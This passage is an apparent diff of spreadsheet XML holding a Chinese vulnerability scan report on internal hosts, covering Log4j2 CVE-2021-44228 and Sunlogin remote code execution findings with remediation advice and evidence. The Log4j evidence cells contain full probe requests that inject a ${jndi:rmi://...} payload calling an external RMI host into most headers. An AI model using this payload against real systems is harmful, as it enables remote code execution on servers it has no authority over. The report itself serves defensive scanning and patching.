+&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Bad Request&lt;/TITLE&gt;
+&lt;META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"&gt;&lt;/HEAD&gt;
+&lt;BODY&gt;&lt;h2&gt;Bad Request&lt;/h2&gt;
+&lt;hr&gt;&lt;p&gt;HTTP Error 400. The request is badly formed.&lt;/p&gt;
+&lt;/BODY&gt;&lt;/HTML&gt;</t>
+        </is>
+      </c>
+      <c r="X6" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y6" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="7">
+      <c r="A7" t="inlineStr">
+        <is>
+          <t>Apache Log4j2远程代码执行漏洞(CVE-2021-44228)</t>
+        </is>
+      </c>
+      <c r="B7" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C7" t="inlineStr">
+        <is>
+          <t>严重</t>
+        </is>
+      </c>
+      <c r="D7" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E7" t="inlineStr">
+        <is>
+          <t>1.Java 6 将 log4j 升级到 2.3.1 版本，Java 7 将 log4j 升级到 2.12.3 版本，Java 8 或更高版本将 log4j 升级到 2.17.0 版本，下载地址：https://logging.apache.org/log4j/2.x/download.html
+2.若暂时无法升级，删除jar包中漏洞相关的JndiLookup.class文件： zip -q -d log4j-core-xxx.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</t>
+        </is>
+      </c>
+      <c r="F7" t="inlineStr">
+        <is>
+          <t>Apache Log4j是一个功能强大的日志组件，提供方便的日志记录。
+Apache Log4j2存在远程代码执行漏洞，由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。</t>
+        </is>
+      </c>
+      <c r="G7" t="inlineStr">
+        <is>
+          <t>热点漏洞、勒索利用、病毒利用、活跃漏洞、APT利用、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H7" t="inlineStr">
+        <is>
+          <t>STA</t>
+        </is>
+      </c>
+      <c r="I7" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J7" t="inlineStr">
+        <is>
+          <t>CVE-2021-44228</t>
+        </is>
+      </c>
+      <c r="K7" t="inlineStr">
+        <is>
+          <t>2026-07-13 14:21</t>
+        </is>
+      </c>
+      <c r="L7" t="inlineStr">
+        <is>
+          <t>2026-07-13 14:21</t>
+        </is>
+      </c>
+      <c r="M7" t="inlineStr">
+        <is>
+          <t>172.30.15.44</t>
+        </is>
+      </c>
+      <c r="N7" t="inlineStr">
+        <is>
+          <t>其他</t>
+        </is>
+      </c>
+      <c r="O7" t="inlineStr">
+        <is>
+          <t>未归类组</t>
+        </is>
+      </c>
+      <c r="P7" t="inlineStr"/>
+      <c r="Q7" t="inlineStr">
+        <is>
+          <t>test-phone</t>
+        </is>
+      </c>
+      <c r="R7" t="inlineStr">
+        <is>
+          <t>核心资产</t>
+        </is>
+      </c>
+      <c r="S7" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T7" t="inlineStr">
+        <is>
+          <t>8080</t>
+        </is>
+      </c>
+      <c r="U7" t="inlineStr">
+        <is>
+          <t>172.30.15.44/</t>
+        </is>
+      </c>
+      <c r="V7" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W7" t="inlineStr">
+        <is>
+          <t>页面url: 172.30.15.44/
+请求体: POST / HTTP/1.1
+Host: 192.168.50.98
+User-Agent: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept-Encoding: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept: */*
+Connection: keep-alive
+Accept-Charset: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept-Language: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept-Ranges: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Cache-Control: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Cookie: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Content-Type: application/x-www-form-urlencoded
+Date: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+From: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Modified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-None-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Unmodified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Max-Forwards: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Pragma: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Proxy-Authorization: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Referer: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+TE: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Upgrade: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Warning: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Content-Length: 45
+${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+响应体: HTTP/1.1 400 Bad Request
+Content-Type: text/html; charset=us-ascii
+Server: Microsoft-HTTPAPI/2.0
+Date: Fri, 09 Sep 2022 01:54:21 GMT
+Connection: close
+Content-Length: 311
+&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"&gt;
+&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Bad Request&lt;/TITLE&gt;
+&lt;META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"&gt;&lt;/HEAD&gt;
+&lt;BODY&gt;&lt;h2&gt;Bad Request&lt;/h2&gt;
+&lt;hr&gt;&lt;p&gt;HTTP Error 400. The request is badly formed.&lt;/p&gt;
+&lt;/BODY&gt;&lt;/HTML&gt;</t>
+        </is>
+      </c>
+      <c r="X7" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y7" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="8">
+      <c r="A8" t="inlineStr">
+        <is>
+          <t>Apache Log4j2远程代码执行漏洞(CVE-2021-44228)</t>
+        </is>
+      </c>
+      <c r="B8" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C8" t="inlineStr">
+        <is>
+          <t>严重</t>
+        </is>
+      </c>
+      <c r="D8" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E8" t="inlineStr">
+        <is>
+          <t>1.Java 6 将 log4j 升级到 2.3.1 版本，Java 7 将 log4j 升级到 2.12.3 版本，Java 8 或更高版本将 log4j 升级到 2.17.0 版本，下载地址：https://logging.apache.org/log4j/2.x/download.html
+2.若暂时无法升级，删除jar包中漏洞相关的JndiLookup.class文件： zip -q -d log4j-core-xxx.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</t>
+        </is>
+      </c>
+      <c r="F8" t="inlineStr">
+        <is>
+          <t>Apache Log4j是一个功能强大的日志组件，提供方便的日志记录。
+Apache Log4j2存在远程代码执行漏洞，由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。</t>
+        </is>
+      </c>
+      <c r="G8" t="inlineStr">
+        <is>
+          <t>热点漏洞、勒索利用、病毒利用、活跃漏洞、APT利用、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H8" t="inlineStr">
+        <is>
+          <t>STA</t>
+        </is>
+      </c>
+      <c r="I8" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J8" t="inlineStr">
+        <is>
+          <t>CVE-2021-44228</t>
+        </is>
+      </c>
+      <c r="K8" t="inlineStr">
+        <is>
+          <t>2026-07-13 14:17</t>
+        </is>
+      </c>
+      <c r="L8" t="inlineStr">
+        <is>
+          <t>2026-07-13 14:17</t>
+        </is>
+      </c>
+      <c r="M8" t="inlineStr">
+        <is>
+          <t>192.168.50.17</t>
+        </is>
+      </c>
+      <c r="N8" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O8" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P8" t="inlineStr"/>
+      <c r="Q8" t="inlineStr"/>
+      <c r="R8" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S8" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T8" t="inlineStr">
+        <is>
+          <t>8080</t>
+        </is>
+      </c>
+      <c r="U8" t="inlineStr">
+        <is>
+          <t>192.168.50.17/</t>
+        </is>
+      </c>
+      <c r="V8" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W8" t="inlineStr">
+        <is>
+          <t>页面url: 192.168.50.17/
+请求体: POST / HTTP/1.1
+Host: 192.168.50.98
+User-Agent: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept-Encoding: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept: */*
+Connection: keep-alive
+Accept-Charset: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept-Language: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Accept-Ranges: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Cache-Control: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Cookie: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Content-Type: application/x-www-form-urlencoded
+Date: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+From: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Modified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-None-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+If-Unmodified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Max-Forwards: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Pragma: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Proxy-Authorization: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Referer: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+TE: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Upgrade: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Warning: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+Content-Length: 45
+${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
+响应体: HTTP/1.1 400 Bad Request
+Content-Type: text/html; charset=us-ascii
+Server: Microsoft-HTTPAPI/2.0
+Date: Fri, 09 Sep 2022 01:54:21 GMT
+Connection: close
+Content-Length: 311
+&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"&gt;
+&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Bad Request&lt;/TITLE&gt;
+&lt;META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"&gt;&lt;/HEAD&gt;
+&lt;BODY&gt;&lt;h2&gt;Bad Request&lt;/h2&gt;
+&lt;hr&gt;&lt;p&gt;HTTP Error 400. The request is badly formed.&lt;/p&gt;
+&lt;/BODY&gt;&lt;/HTML&gt;</t>
+        </is>
+      </c>
+      <c r="X8" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y8" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="9">
+      <c r="A9" t="inlineStr">
+        <is>
+          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+        </is>
+      </c>
+      <c r="B9" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C9" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D9" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E9" t="inlineStr">
+        <is>
+          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
+https://sunlogin.oray.com/download/</t>
+        </is>
+      </c>
+      <c r="F9" t="inlineStr">
+        <is>
+          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+        </is>
+      </c>
+      <c r="G9" t="inlineStr">
+        <is>
+          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H9" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I9" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J9" t="inlineStr"/>
+      <c r="K9" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:23</t>
+        </is>
+      </c>
+      <c r="L9" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:23</t>
+        </is>
+      </c>
+      <c r="M9" t="inlineStr">
+        <is>
+          <t>192.168.64.44</t>
+        </is>
+      </c>
+      <c r="N9" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O9" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P9" t="inlineStr"/>
+      <c r="Q9" t="inlineStr"/>
+      <c r="R9" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S9" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T9" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U9" t="inlineStr"/>
+      <c r="V9" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W9" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X9" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y9" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="10">
+      <c r="A10" t="inlineStr">
+        <is>
+          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+        </is>
+      </c>
+      <c r="B10" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C10" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D10" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E10" t="inlineStr">
+        <is>
+          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
+https://sunlogin.oray.com/download/</t>
+        </is>
+      </c>
+      <c r="F10" t="inlineStr">
+        <is>
+          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+        </is>
+      </c>
+      <c r="G10" t="inlineStr">
+        <is>
+          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H10" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I10" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J10" t="inlineStr"/>
+      <c r="K10" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:23</t>
+        </is>
+      </c>
+      <c r="L10" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:22</t>
+        </is>
+      </c>
+      <c r="M10" t="inlineStr">
+        <is>
+          <t>192.168.66.176</t>
+        </is>
+      </c>
+      <c r="N10" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O10" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P10" t="inlineStr"/>
+      <c r="Q10" t="inlineStr"/>
+      <c r="R10" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S10" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T10" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U10" t="inlineStr"/>
+      <c r="V10" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W10" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X10" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y10" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="11">
+      <c r="A11" t="inlineStr">
+        <is>
+          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+        </is>
+      </c>
+      <c r="B11" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C11" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D11" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E11" t="inlineStr">
+        <is>
+          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
+https://sunlogin.oray.com/download/</t>
+        </is>
+      </c>
+      <c r="F11" t="inlineStr">
+        <is>
+          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+        </is>
+      </c>
+      <c r="G11" t="inlineStr">
+        <is>
+          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H11" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I11" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J11" t="inlineStr"/>
+      <c r="K11" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:11</t>
+        </is>
+      </c>
+      <c r="L11" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:11</t>
+        </is>
+      </c>
+      <c r="M11" t="inlineStr">
+        <is>
+          <t>192.168.50.190</t>
+        </is>
+      </c>
+      <c r="N11" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O11" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P11" t="inlineStr"/>
+      <c r="Q11" t="inlineStr"/>
+      <c r="R11" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S11" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T11" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U11" t="inlineStr"/>
+      <c r="V11" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W11" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" 